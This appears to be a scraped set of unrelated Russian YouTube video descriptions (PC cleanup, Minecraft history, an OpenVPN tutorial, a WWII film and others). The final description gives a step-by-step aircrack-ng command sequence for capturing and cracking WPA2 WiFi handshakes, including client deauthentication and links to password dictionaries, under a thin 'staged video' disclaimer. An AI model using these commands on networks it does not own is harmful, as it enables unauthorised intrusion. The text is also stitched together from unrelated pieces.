Поступил запрос на проверку и чистку компа. Явных жалоб не было, но подозрения были. Плюс удалил глючное и поставил нужное.
1:40 Проверка ОС в программе Trojan Killer.
6:52 Поиск подозрительнов файлов на диске С, работа в программе Everything
15:55 Проверка файлов на VirusTotal.com
20:13 Удаление «глючных программ» и репаков.
26:40 Установка полезного софта.
34:53 Удаление лишних задач из планировщика заданий.
46:41 Проверка запущенных задач в Autoruns, сканирование компьютера программой AdwCleaner.
58:20 Очистка мусора программой Wise Disk Cleaner, проверка диска программой Victoria SSD
1:05:48 Проверка системы программами Wise Care и Rogue Killer.
1:23:53 Проверка запущенных процессов в программе Process Hacker.
1:37:53 Проверка системы антивирусом
Kaspersky.
— Мой сайт: 140200.pro/
Группа ВК: vk.com/pro140200
Телеграмм канал: @main140200
— Поддержать автора монеткой:
Донат: www.donationalerts.ru/r/140200
PayPal: www.paypal.me/140200
Яндекс кошелек: 41001747515445
Приветствую! Это видео я готовил почти 3 недели. Оно представляет собой своеобразный «документальный фильм», посвященный истории майнкрафт. В нем мы отследим развитие игры, начиная с тех времен когда она носила другое название, и заканчивая майнкрафт 1.16. В этом видео есть огромное количество интересных фактов и открытий, касающихся старых версий: классик, индев и других. Мы узнаем, когда же появилось первое меню майнкрафт, кто был самым старым мобом и многое другое. Это только первая часть, планируется трилогия. 11 лет майнкрафт.
Кто я такой? Я — Мс кус, ютубер, стример и рэпер. Снимаю различные видео по играм (в основном minecraft) и читаю рэп (всякие угарные клипы делаю, ну или просто там картинка и музыка играет). В майнкрафте в основном играю в мини игры — скай варс, бед варс, билдбатл и другие. Также могу снять рэп про майнкрафт! За постандеграунд шарю, шаблонных ютуберов презираю. Майнкрафт обновление
Привет. Меня зовут Рахим Муратов. Я веб-разработчик и автор этого канала. Занимаюсь обучением, веду курсы и помогаю новичкам.
В этом видео разберем проблему подхода к обучению. Я покажу план разбивки проекта и расскажу как правильно обучаться. Этот подход независимо применим к разным языкам и технологиям.
Фильм о подвиге подольских курсантов в октябре 1941 года под Москвой. Курсанты подольских артиллерийского и пехотного училищ получают приказ занять оборону на Ильинском рубеже и сдерживать совместно с регулярными частями 43-й армии фашистских захватчиков, пока не подойдёт подкрепление. Вчерашние мальчишки, погибая, помогают сдерживать многократно превышающие силы немцев и на двенадцать дней становятся преградой на пути врага к Москве… На последний рубеж перед Москвой были направлены около трёх с половиной тысяч курсантов двух подольских училищ и их командиров… Большинство из них остались на рубеже навсегда.
В этом видео будем поднимать #OpenVPN чтобы иметь доступ к локальной сети за клиентом. Настроим LTE подключение, установим электрощит, систему видеонаблюдения и многое другое.
Представим, что есть несколько домов или зданий. Для простоты будем называть их объектами, которые разнесены на относительно большое расстояние. Внутри каждого такого объекта есть какой-то набор сетевых устройств. Это могут быть IP-камеры, видеорегистраторы, может какие-то проекты на Raspberry PI или сервера. Например, это может быть загородный участок, на котором установлено видеонаблюдение с сетевым интерфейсом и, скажем, система для управления отоплением и теплым полом. Либо это несколько торговых помещений с онлайн-кассами, компьютерами и отдельно есть помещение, где расположен FTP сервер и база данных со всеми товарами и остатками (причем эти вещи светить наружу, в интернет, мы никак не хотим).
Первое, что нам нужно сделать — это обеспечить доступ в интернет на каждом объекте (да, его там нет пока) и предположим, что у нас нет никакой возможность провести туда оптоволокно, витую пару или даже ADSL, а использовать спутниковый интернет слишком накладно. Ну а Илона Маска ждать мы не можем, все нужно сделать до ”вчера”.
Второе — мы хотим иметь возможность удаленно управлять всеми этими устройствами, независимо от того, есть ли у них поддержка каких-то облачных сервисов или нет. Скажем, нужно иногда удаленно вносить какие-то изменения в конфигурацию маршрутизаторов или мы хотим открыть приложение на смартфоне и получить видео-поток с любой IP-камеры на любом объекте или же заранее, перед выездом на дачу, зайти на WEB-интерфейс и включить там водонагреватель и подогрев полов, чтобы у вашей второй половинки и детишек ножки не мерзли. Третье — мы хотим из локальной сети на одном объекте иметь доступ к устройствам на другом объекте, то есть к устройствам из другой локальной сети. Причем это нужно сделать без дополнительной настройки самих устройств — для них все должно быть прозрачно. Ну, например, мы хотим, чтобы ноутбуки в торговом помещении имели доступ к базе данных товаров, которая находится в другом здании.
Четвертое — сделать все это нужно с небольшими затратами.
Вот такой scope задач у нас получился. И в этом видео мы постараемся решить их все.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…